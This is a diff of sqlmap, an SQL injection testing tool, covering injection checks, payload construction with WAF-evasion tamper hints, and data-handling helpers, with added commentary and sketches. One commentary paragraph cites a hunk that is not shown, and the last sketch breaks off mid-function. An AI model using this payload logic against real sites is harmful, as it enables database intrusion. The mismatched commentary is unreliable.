||||||
|
|
||||||
elif parameter in conf.skip:
|
elif parameter in conf.skip:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
elif parameter == conf.csrfToken:
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Ignore session-like parameters for --level < 4
|
# Ignore session-like parameters for --level < 4
|
||||||
elif conf.level < 4 and parameter.upper() in IGNORE_PARAMETERS:
|
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
|
infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
|
||||||
check = checkDynParam(place, parameter, value)
|
check = checkDynParam(place, parameter, value)
|
||||||
|
|
||||||
if not check:
|
if not check:
|
||||||
warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
|
warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if conf.skipStatic:
|
||||||
|
infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
testSqlInj = False
|
||||||
else:
|
else:
|
||||||
infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
|
infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
kb.testedParams.add(paramKey)
|
kb.testedParams.add(paramKey)
|
||||||
|
|
||||||
if testSqlInj:
|
if testSqlInj:
|
||||||
|
if place == PLACE.COOKIE:
|
||||||
|
pushValue(kb.mergeCookies)
|
||||||
|
kb.mergeCookies = False
|
||||||
|
|
||||||
check = heuristicCheckSqlInjection(place, parameter)
|
check = heuristicCheckSqlInjection(place, parameter)
|
||||||
|
|
||||||
if check != HEURISTIC_TEST.POSITIVE:
|
if check != HEURISTIC_TEST.POSITIVE:
|
||||||
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
||||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
infoMsg = "testing for SQL injection on %s " % place
|
infoMsg = "testing for SQL injection on %s " % paramType
|
||||||
infoMsg += "parameter '%s'" % parameter
|
infoMsg += "parameter '%s'" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
@ -497,10 +530,13 @@ def start():
|
||||||
paramKey = (conf.hostname, conf.path, None, None)
|
paramKey = (conf.hostname, conf.path, None, None)
|
||||||
kb.testedParams.add(paramKey)
|
kb.testedParams.add(paramKey)
|
||||||
else:
|
else:
|
||||||
warnMsg = "%s parameter '%s' is not " % (place, parameter)
|
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
|
||||||
warnMsg += "injectable"
|
warnMsg += "injectable"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if place == PLACE.COOKIE:
|
||||||
|
kb.mergeCookies = popValue()
|
||||||
|
|
||||||
if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
|
if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
|
||||||
if kb.vainRun and not conf.multipleTargets:
|
if kb.vainRun and not conf.multipleTargets:
|
||||||
errMsg = "no parameter(s) found for testing in the provided data "
|
errMsg = "no parameter(s) found for testing in the provided data "
|
||||||
|
@ -545,14 +581,19 @@ def start():
|
||||||
elif conf.string:
|
elif conf.string:
|
||||||
errMsg += " Also, you can try to rerun by providing a "
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
errMsg += "valid value for option '--string' as perhaps the string you "
|
errMsg += "valid value for option '--string' as perhaps the string you "
|
||||||
errMsg += "have choosen does not match "
|
errMsg += "have chosen does not match "
|
||||||
errMsg += "exclusively True responses"
|
errMsg += "exclusively True responses"
|
||||||
elif conf.regexp:
|
elif conf.regexp:
|
||||||
errMsg += " Also, you can try to rerun by providing a "
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
errMsg += "valid value for option '--regexp' as perhaps the regular "
|
errMsg += "valid value for option '--regexp' as perhaps the regular "
|
||||||
errMsg += "expression that you have choosen "
|
errMsg += "expression that you have chosen "
|
||||||
errMsg += "does not match exclusively True responses"
|
errMsg += "does not match exclusively True responses"
|
||||||
|
|
||||||
|
if not conf.tamper:
|
||||||
|
errMsg += " If you suspect that there is some kind of protection mechanism "
|
||||||
|
errMsg += "involved (e.g. WAF) maybe you could retry "
|
||||||
|
errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
|
||||||
|
|
||||||
raise SqlmapNotVulnerableException(errMsg)
|
raise SqlmapNotVulnerableException(errMsg)
|
||||||
else:
|
else:
|
||||||
# Flush the flag
|
# Flush the flag
|
||||||
|
@ -598,14 +639,14 @@ def start():
|
||||||
except SqlmapSilentQuitException:
|
except SqlmapSilentQuitException:
|
||||||
raise
|
raise
|
||||||
|
|
||||||
except SqlmapBaseException, e:
|
except SqlmapBaseException, ex:
|
||||||
e = getUnicode(e)
|
errMsg = getUnicode(ex.message)
|
||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
e += ", skipping to the next %s" % ("form" if conf.forms else "URL")
|
errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")
|
||||||
logger.error(e)
|
logger.error(errMsg)
|
||||||
else:
|
else:
|
||||||
logger.critical(e)
|
logger.critical(errMsg)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
|
|
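The @@ -287,7 +297,13 @@ hunk above replaces the silent "testSqlInj &= conf.hostname not in kb.vulnHosts" filter with a one-time prompt whose answer is cached in kb.skipVulnHost. A minimal standalone sketch of that ask-once pattern follows; vuln_hosts, should_test and answer_provider are illustrative names, not sqlmap internals.

# Sketch only: cache the first Y/n answer and reuse it for every later hit on a known-vulnerable host.
vuln_hosts = {"testphp.example.com"}   # assumed example data
skip_vuln_host = None                  # None means the question has not been asked yet

def should_test(hostname, answer_provider):
    global skip_vuln_host
    if hostname in vuln_hosts:
        if skip_vuln_host is None:
            message = ("SQL injection vulnerability has already been detected "
                       "against '%s'. Do you want to skip "
                       "further tests involving it? [Y/n] " % hostname)
            reply = (answer_provider(message) or "Y").upper()
            skip_vuln_host = reply != "N"
        return not skip_vuln_host
    return True

print(should_test("testphp.example.com", lambda _: "n"))  # answered "n": keep testing -> True
print(should_test("testphp.example.com", lambda _: "y"))  # cached answer reused, prompt not shown -> True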
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -71,9 +71,9 @@ def setHandler():
items.remove(_)
items.insert(0, _)

-for name, aliases, Handler, Connector in items:
+for dbms, aliases, Handler, Connector in items:
-if conf.dbms and conf.dbms not in aliases:
+if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
-debugMsg = "skipping test for %s" % name
+debugMsg = "skipping test for %s" % dbms
logger.debug(debugMsg)
continue

@@ -84,7 +84,7 @@ def setHandler():
logger.debug("forcing timeout to 10 seconds")
conf.timeout = 10

-dialect = DBMS_DICT[name][3]
+dialect = DBMS_DICT[dbms][3]

if dialect:
sqlalchemy = SQLAlchemy(dialect=dialect)
@@ -93,7 +93,10 @@ def setHandler():
if sqlalchemy.connector:
conf.dbmsConnector = sqlalchemy
else:
-conf.dbmsConnector.connect()
+try:
+conf.dbmsConnector.connect()
+except NameError:
+pass
else:
conf.dbmsConnector.connect()
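The setHandler() change above tightens the DBMS filter: a forced --dbms value now has to match either the handler key itself or one of its aliases, case-insensitively, before a handler is tried. A small sketch of that predicate under an assumed, reduced alias table (not the full DBMS_DICT):

# Sketch only: skip handlers whose key and aliases both fail to match the forced DBMS name.
HANDLERS = [
    ("mysql", ("mysql", "mariadb")),
    ("postgresql", ("postgres", "pgsql", "psql")),
]

def candidates(forced_dbms):
    for dbms, aliases in HANDLERS:
        if forced_dbms and forced_dbms.lower() != dbms and forced_dbms.lower() not in aliases:
            continue  # corresponds to "skipping test for %s" % dbms
        yield dbms

print(list(candidates("PostgreSQL")))  # ['postgresql']
print(list(candidates(None)))          # no --dbms forced: every handler stays in play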
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

@@ -10,6 +10,7 @@ import re
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
from lib.core.common import isDBMSVersionAtLeast
from lib.core.common import isNumber
from lib.core.common import isTechniqueAvailable
@@ -19,6 +20,7 @@ from lib.core.common import safeSQLIdentificatorNaming
from lib.core.common import singleTimeWarnMessage
from lib.core.common import splitFields
from lib.core.common import unArrayizeValue
+from lib.core.common import urlencode
from lib.core.common import zeroDepthSearch
from lib.core.data import conf
from lib.core.data import kb
@@ -26,11 +28,15 @@ from lib.core.data import queries
from lib.core.dicts import DUMP_DATA_PREPROCESS
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS
+from lib.core.enums import HTTP_HEADER
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapNoneDataException
+from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_COOKIE_DELIMITER
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER
@@ -44,10 +50,10 @@ class Agent(object):
def payloadDirect(self, query):
query = self.cleanupPayload(query)

-if query.startswith("AND "):
+if query.upper().startswith("AND "):
-query = query.replace("AND ", "SELECT ", 1)
+query = re.sub(r"(?i)AND ", "SELECT ", query, 1)
-elif query.startswith(" UNION ALL "):
+elif query.upper().startswith(" UNION ALL "):
-query = query.replace(" UNION ALL ", "", 1)
+query = re.sub(r"(?i) UNION ALL ", "", query, 1)
elif query.startswith("; "):
query = query.replace("; ", "", 1)

@@ -84,7 +90,7 @@ class Agent(object):

paramString = conf.parameters[place]
paramDict = conf.paramDict[place]
-origValue = paramDict[parameter]
+origValue = getUnicode(paramDict[parameter])

if place == PLACE.URI:
paramString = origValue
@@ -98,14 +104,26 @@ class Agent(object):
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
origValue = origValue.split('>')[-1]
-elif kb.postHint == POST_HINT.JSON:
+elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
-origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
+origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
else:
-origValue = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"]+\Z)", origValue)
+_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
+origValue = _.split('=', 1)[1] if '=' in _ else ""
elif place == PLACE.CUSTOM_HEADER:
paramString = origValue
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue[origValue.index(',') + 1:]
+match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
+if match:
+origValue = match.group("value")
+elif ',' in paramString:
+header = paramString.split(',')[0]

+if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
+origValue = origValue.split(' ')[-1].split(':')[-1]

+if conf.prefix:
+value = origValue

if value is None:
if where == PAYLOAD.WHERE.ORIGINAL:
@@ -117,7 +135,9 @@ class Agent(object):
_ = randomInt(2)
value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1)
elif conf.invalidBignum:
-value = "%d.%d" % (randomInt(6), randomInt(1))
+value = randomInt(6)
+elif conf.invalidString:
+value = randomStr(6)
else:
if newValue.startswith("-"):
value = ""
@@ -136,14 +156,40 @@ class Agent(object):
_ = "%s%s" % (origValue, CUSTOM_INJECTION_MARK_CHAR)
if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and not '"%s"' % _ in paramString:
newValue = '"%s"' % newValue
+elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and not "'%s'" % _ in paramString:
+newValue = "'%s'" % newValue
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
else:
-retVal = paramString.replace("%s=%s" % (parameter, origValue),
-"%s=%s" % (parameter, self.addPayloadDelimiters(newValue)))
+def _(pattern, repl, string):
+retVal = string
+match = None
+for match in re.finditer(pattern, string):
+pass

+if match:
+while True:
+_ = re.search(r"\\g<([^>]+)>", repl)
+if _:
+repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
+else:
+break
+retVal = string[:match.start()] + repl + string[match.end():]
+return retVal

+if origValue:
+regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
+retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+else:
+retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+if retVal == paramString and urlencode(parameter) != parameter:
+retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)

+if retVal:
+retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')

return retVal

@@ -176,7 +222,7 @@ class Agent(object):

# If we are replacing (<where>) the parameter original value with
# our payload do not prepend with the prefix
-if where == PAYLOAD.WHERE.REPLACE:
+if where == PAYLOAD.WHERE.REPLACE and not conf.prefix:
query = ""

# If the technique is stacked queries (<stype>) do not put a space
@@ -192,10 +238,11 @@ class Agent(object):
else:
query = kb.injection.prefix or prefix or ""

-if not (expression and expression[0] == ";"):
+if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
query += " "

-query = "%s%s" % (query, expression)
+if query:
+query = "%s%s" % (query.replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)

return query

@@ -225,11 +272,11 @@ class Agent(object):

# If we are replacing (<where>) the parameter original value with
# our payload do not append the suffix
-if where == PAYLOAD.WHERE.REPLACE:
+if where == PAYLOAD.WHERE.REPLACE and not conf.suffix:
pass

elif suffix and not comment:
-expression += " %s" % suffix
+expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER)

return re.sub(r"(?s);\W*;", ";", expression)

@@ -251,7 +298,7 @@ class Agent(object):
payload = payload.replace(_, randomStr())

if origValue is not None:
-payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else "'%s'" % origValue)
+payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))

if "[INFERENCE]" in payload:
if Backend.getIdentifiedDbms() is not None:
@@ -266,7 +313,7 @@ class Agent(object):
inferenceQuery = inference.query

payload = payload.replace("[INFERENCE]", inferenceQuery)
-else:
+elif not kb.testMode:
errMsg = "invalid usage of inference payload without "
errMsg += "knowledge of underlying DBMS"
raise SqlmapNoneDataException(errMsg)
@@ -351,7 +398,8 @@ class Agent(object):
else:
nulledCastedField = rootQuery.isnull.query % nulledCastedField

-if conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','):
+kb.binaryField = conf.binaryFields and field in conf.binaryFields.split(',')
+if conf.hexConvert or kb.binaryField:
nulledCastedField = self.hexConvertField(nulledCastedField)

return nulledCastedField
@@ -814,6 +862,9 @@ class Agent(object):
@rtype: C{str}
"""

+if " FROM " not in query:
+return query

limitedQuery = query
limitStr = queries[Backend.getIdentifiedDbms()].limit.query
fromIndex = limitedQuery.index(" FROM ")
@@ -943,33 +994,35 @@ class Agent(object):

return caseExpression

-def addPayloadDelimiters(self, inpStr):
+def addPayloadDelimiters(self, value):
"""
Adds payload delimiters around the input string
"""

-return "%s%s%s" % (PAYLOAD_DELIMITER, inpStr, PAYLOAD_DELIMITER) if inpStr else inpStr
+return "%s%s%s" % (PAYLOAD_DELIMITER, value, PAYLOAD_DELIMITER) if value else value

-def removePayloadDelimiters(self, inpStr):
+def removePayloadDelimiters(self, value):
"""
Removes payload delimiters from inside the input string
"""

-return inpStr.replace(PAYLOAD_DELIMITER, '') if inpStr else inpStr
+return value.replace(PAYLOAD_DELIMITER, '') if value else value

-def extractPayload(self, inpStr):
+def extractPayload(self, value):
"""
Extracts payload from inside of the input string
"""

-return extractRegexResult("(?s)%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr)
+_ = re.escape(PAYLOAD_DELIMITER)
+return extractRegexResult("(?s)%s(?P<result>.*?)%s" % (_, _), value)

-def replacePayload(self, inpStr, payload):
+def replacePayload(self, value, payload):
"""
Replaces payload inside the input string with a given payload
"""

-return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), inpStr) if inpStr else inpStr
+_ = re.escape(PAYLOAD_DELIMITER)
+return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value

def runAsDBMSUser(self, query):
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
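extractPayload() and replacePayload() above now pass PAYLOAD_DELIMITER through re.escape() before building their patterns, so a delimiter containing regex metacharacters can no longer break them. A self-contained sketch of the same round trip; the delimiter value here is an assumption, not sqlmap's actual marker.

import re

PAYLOAD_DELIMITER = "__PAYLOAD__"  # assumed value for illustration

def add_payload_delimiters(value):
    return "%s%s%s" % (PAYLOAD_DELIMITER, value, PAYLOAD_DELIMITER) if value else value

def extract_payload(value):
    _ = re.escape(PAYLOAD_DELIMITER)
    match = re.search("(?s)%s(?P<result>.*?)%s" % (_, _), value or "")
    return match.group("result") if match else None

def replace_payload(value, payload):
    _ = re.escape(PAYLOAD_DELIMITER)
    replacement = ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\")
    return re.sub("(?s)(%s.*?%s)" % (_, _), replacement, value) if value else value

wrapped = "id=" + add_payload_delimiters("1 AND 1=1")
print(extract_payload(wrapped))               # 1 AND 1=1
print(replace_payload(wrapped, "1 AND 2>1"))  # id=__PAYLOAD__1 AND 2>1__PAYLOAD__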
@@ -1,15 +1,36 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

+try:
+import cPickle as pickle
+except:
+import pickle

+import itertools
import os
-import pickle
+import sys
import tempfile

-from lib.core.settings import BIGARRAY_CHUNK_LENGTH
+from lib.core.exception import SqlmapSystemException
+from lib.core.settings import BIGARRAY_CHUNK_SIZE

+DEFAULT_SIZE_OF = sys.getsizeof(object())

+def _size_of(object_):
+"""
+Returns total size of a given object_ (in bytes)
+"""

+retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
+if isinstance(object_, dict):
+retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
+elif hasattr(object_, "__iter__"):
+retval += sum(_size_of(_) for _ in object_)
+return retval

class Cache(object):
"""
@@ -28,15 +49,21 @@ class BigArray(list):

def __init__(self):
self.chunks = [[]]
+self.chunk_length = sys.maxint
self.cache = None
-self.length = 0
self.filenames = set()
+self._os_remove = os.remove
+self._size_counter = 0

def append(self, value):
self.chunks[-1].append(value)
-if len(self.chunks[-1]) >= BIGARRAY_CHUNK_LENGTH:
+if self.chunk_length == sys.maxint:
+self._size_counter += _size_of(value)
+if self._size_counter >= BIGARRAY_CHUNK_SIZE:
+self.chunk_length = len(self.chunks[-1])
+self._size_counter = None
+if len(self.chunks[-1]) >= self.chunk_length:
filename = self._dump(self.chunks[-1])
-del(self.chunks[-1][:])
self.chunks[-1] = filename
self.chunks.append([])

@@ -47,8 +74,13 @@ class BigArray(list):
def pop(self):
if len(self.chunks[-1]) < 1:
self.chunks.pop()
-with open(self.chunks[-1], "rb") as fp:
-self.chunks[-1] = pickle.load(fp)
+try:
+with open(self.chunks[-1], "rb") as fp:
+self.chunks[-1] = pickle.load(fp)
+except IOError, ex:
+errMsg = "exception occurred while retrieving data "
+errMsg += "from a temporary file ('%s')" % ex
+raise SqlmapSystemException, errMsg
return self.chunks[-1].pop()

def index(self, value):
@@ -57,21 +89,41 @@ class BigArray(list):
return index
return ValueError, "%s is not in list" % value

-def _dump(self, value):
+def _dump(self, chunk):
-handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
-self.filenames.add(filename)
-os.close(handle)
-with open(filename, "w+b") as fp:
-pickle.dump(value, fp)
-return filename
+try:
+handle, filename = tempfile.mkstemp()
+self.filenames.add(filename)
+os.close(handle)
+with open(filename, "w+b") as fp:
+pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
+return filename
+except (OSError, IOError), ex:
+errMsg = "exception occurred while storing data "
+errMsg += "to a temporary file ('%s'). Please " % ex
+errMsg += "make sure that there is enough disk space left. If problem persists, "
+errMsg += "try to set environment variable 'TEMP' to a location "
+errMsg += "writeable by the current user"
+raise SqlmapSystemException, errMsg

def _checkcache(self, index):
if (self.cache and self.cache.index != index and self.cache.dirty):
filename = self._dump(self.cache.data)
self.chunks[self.cache.index] = filename
if not (self.cache and self.cache.index == index):
-with open(self.chunks[index], "rb") as fp:
-self.cache = Cache(index, pickle.load(fp), False)
+try:
+with open(self.chunks[index], "rb") as fp:
+self.cache = Cache(index, pickle.load(fp), False)
+except IOError, ex:
+errMsg = "exception occurred while retrieving data "
+errMsg += "from a temporary file ('%s')" % ex
+raise SqlmapSystemException, errMsg

+def __getstate__(self):
+return self.chunks, self.filenames

+def __setstate__(self, state):
+self.__init__()
+self.chunks, self.filenames = state

def __getslice__(self, i, j):
retval = BigArray()
@@ -84,8 +136,8 @@ class BigArray(list):
def __getitem__(self, y):
if y < 0:
y += len(self)
-index = y / BIGARRAY_CHUNK_LENGTH
+index = y / self.chunk_length
-offset = y % BIGARRAY_CHUNK_LENGTH
+offset = y % self.chunk_length
chunk = self.chunks[index]
if isinstance(chunk, list):
return chunk[offset]
@@ -94,8 +146,8 @@ class BigArray(list):
return self.cache.data[offset]

def __setitem__(self, y, value):
-index = y / BIGARRAY_CHUNK_LENGTH
+index = y / self.chunk_length
-offset = y % BIGARRAY_CHUNK_LENGTH
+offset = y % self.chunk_length
chunk = self.chunks[index]
if isinstance(chunk, list):
chunk[offset] = value
@@ -112,11 +164,4 @@ class BigArray(list):
yield self[i]

def __len__(self):
-return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
+return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])

-def __del__(self):
-for filename in self.filenames:
-try:
-os.remove(filename)
-except:
-pass
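The BigArray rewrite above stops counting items against BIGARRAY_CHUNK_LENGTH and instead measures the accumulated size of appended objects, freezing chunk_length the first time the running total crosses BIGARRAY_CHUNK_SIZE; full chunks are then pickled out to temporary files. A condensed sketch of that sizing idea, with an assumed threshold and an illustrative class name:

import itertools
import sys

BIGARRAY_CHUNK_SIZE = 1024 * 1024          # assumed threshold in bytes; sqlmap defines its own value
DEFAULT_SIZE_OF = sys.getsizeof(object())

def _size_of(object_):
    # rough recursive size of an object, in bytes
    retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
    if isinstance(object_, dict):
        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
    elif hasattr(object_, "__iter__"):
        retval += sum(_size_of(_) for _ in object_)
    return retval

class SizedChunker(object):
    # illustrative: derive the per-chunk item count from the size of the first chunk
    def __init__(self):
        self.chunk = []
        self.chunk_length = sys.maxsize    # "not decided yet" sentinel (sys.maxint in Python 2)
        self._size_counter = 0

    def append(self, value):
        self.chunk.append(value)
        if self.chunk_length == sys.maxsize:
            self._size_counter += _size_of(value)
            if self._size_counter >= BIGARRAY_CHUNK_SIZE:
                self.chunk_length = len(self.chunk)   # freeze the item count for all later chunks
        return len(self.chunk) >= self.chunk_length   # True means the caller should flush to disk

chunker = SizedChunker()
flushes = [chunker.append(b"x" * 4096) for _ in range(300)]
print(chunker.chunk_length, flushes.count(True))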
lib/core/common.py (750, Normal file → Executable file): file diff suppressed because it is too large.
@@ -1,10 +1,11 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

+import base64
import json
import pickle
import sys
@@ -20,7 +21,7 @@ def base64decode(value):
'foobar'
"""

-return value.decode("base64")
+return base64.b64decode(value)

def base64encode(value):
"""
@@ -30,7 +31,7 @@ def base64encode(value):
'Zm9vYmFy'
"""

-return value.encode("base64")[:-1].replace("\n", "")
+return base64.b64encode(value)

def base64pickle(value):
"""
@@ -41,6 +42,7 @@ def base64pickle(value):
"""

retVal = None

try:
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
except:
@@ -48,7 +50,11 @@ def base64pickle(value):
warnMsg += "instance of a type '%s'" % type(value)
singleTimeWarnMessage(warnMsg)

-retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
+try:
+retVal = base64encode(pickle.dumps(value))
+except:
+retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))

return retVal

def base64unpickle(value):
@@ -59,7 +65,14 @@ def base64unpickle(value):
'foobar'
"""

-return pickle.loads(base64decode(value))
+retVal = None

+try:
+retVal = pickle.loads(base64decode(value))
+except TypeError:
+retVal = pickle.loads(base64decode(bytes(value)))

+return retVal

def hexdecode(value):
"""
@@ -133,17 +146,21 @@ def htmlunescape(value):
return retVal

def singleTimeWarnMessage(message): # Cross-linked function
-pass
+sys.stdout.write(message)
+sys.stdout.write("\n")
+sys.stdout.flush()

def stdoutencode(data):
retVal = None

try:
+data = data or ""

# Reference: http://bugs.python.org/issue1602
if IS_WIN:
-output = data.encode("ascii", "replace")
+output = data.encode(sys.stdout.encoding, "replace")

-if output != data:
+if '?' in output and '?' not in data:
warnMsg = "cannot properly display Unicode characters "
warnMsg += "inside Windows OS command prompt "
warnMsg += "(http://bugs.python.org/issue1602). All "
@@ -157,7 +174,7 @@ def stdoutencode(data):
else:
retVal = data.encode(sys.stdout.encoding)
except:
-retVal = data.encode(UNICODE_ENCODING)
+retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data

return retVal
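base64pickle() above now degrades gracefully: it first tries the highest pickle protocol, then the default protocol, and finally pickles str(value), while base64unpickle() retries with bytes() on a TypeError. A minimal sketch of that fallback chain, standalone and without sqlmap's warning helper:

import base64
import pickle

def base64pickle(value):
    # try progressively cruder serializations, mirroring the fallback order shown above
    for dump in (lambda v: pickle.dumps(v, pickle.HIGHEST_PROTOCOL),
                 pickle.dumps,
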